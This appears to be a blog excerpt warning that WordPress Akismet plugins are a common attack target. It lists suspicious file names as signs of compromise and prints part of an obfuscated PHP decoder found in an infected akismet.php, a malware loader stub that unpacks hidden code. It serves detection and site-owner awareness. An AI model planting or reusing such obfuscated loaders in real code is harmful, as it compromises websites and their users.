Tag Archives: akismet

Akismet Hacked

If your WordPress site has been compromised, try checking out your Akismet plugin. It’s so commonly used that its often subject to attacks. If any of these files are showing up in your plugins folder, you may be the subject of an attack: .akismet.cache.php .akismet.bak.php .akismet.old.php class-akismet.php db-akismet.php One akismet.php file that I found started out something like this: <?php if (!function_exists(“TC9A16C47DA8EEE87”)) { function TC9A16C47DA8EEE87($T059EC46CFE335260) { $T059EC46CFE335260 = base64_decode($T059EC46CFE335260); $TC9A16C47DA8EEE87 = 0; $TA7FB8B0A1C0E2E9E = 0; $T17D35BB9DF7A47E4 = 0; $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[1]) << 8) + ord($T059EC46CFE335260[2]); $TBF14159DC7D007D3 = 3; $T77605D5F26DD5248 = 0; $T4A747C3263CA7A55 = 16; $T7C7E72B89B83E235 = “”; $T0D47BDF6FD9DDE2E = strlen($T059EC46CFE335260); $T43D5686285035C13 = __FILE__; $T43D5686285035C13 = file_get_contents($T43D5686285035C13); $T6BBC58A3B5B11DC4 = 0; preg_match(base64_decode(“LyhwcmludHxzcHJpbnR8ZWNobykv”), $T43D5686285035C13, $T6BBC58A3B5B11DC4); for (;$TBF14159DC7D007D3 < $T0D47BDF6FD9DDE2E;) { if (count($T6BBC58A3B5B11DC4)) exit; if ($T4A747C3263CA7A55 == 0) { $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8); $T65CE9F6823D588A7+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]); $T4A747C3263CA7A55 = 16; } if ($T65CE9F6823D588A7 & 0x8000) { $TC9A16C47DA8EEE87 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 4); $TC9A16C47DA8EEE87+= (ord($T059EC46CFE335260[$TBF14159DC7D007D3]) >> 4); if ($TC9A16C47DA8EEE87) { $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) & 0x0F) + 3; for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T17D35BB9DF7A47E4++) $T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4] = $T7C7E72B89B83E235[$T77605D5F26DD5248 – $TC9A16C47DA8EEE87 + $T17D35BB9DF7A47E4]; $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E; } else { $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8); $TA7FB8B0A1C0E2E9E+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) + 16; for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4++] = $T059EC46CFE335260[$TBF14159DC7D007D3]); $TBF14159DC7D007D3++; $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E; } } else $T7C7E72B89B83E235[$T77605D5F26DD5248++] = $T059EC46CFE335260[$TBF14159DC7D007D3++]; $T65CE9F6823D588A7 <<= 1; $T4A747C3263CA7A55–; if ($TBF14159DC7D007D3 == $T0D47BDF6FD9DDE2E) { $T43D5686285035C13 = implode(“”, $T7C7E72B89B83E235); $T43D5686285035C13 = “?” . “>” . $T43D5686285035C13; return $T43D5686285035C13; } } } }; ?> If you want the PHP code, which is obfuscated, for the akismet.php file I came … Continue reading

Posted in Security, Web Development | Tagged , , , | 1 Comment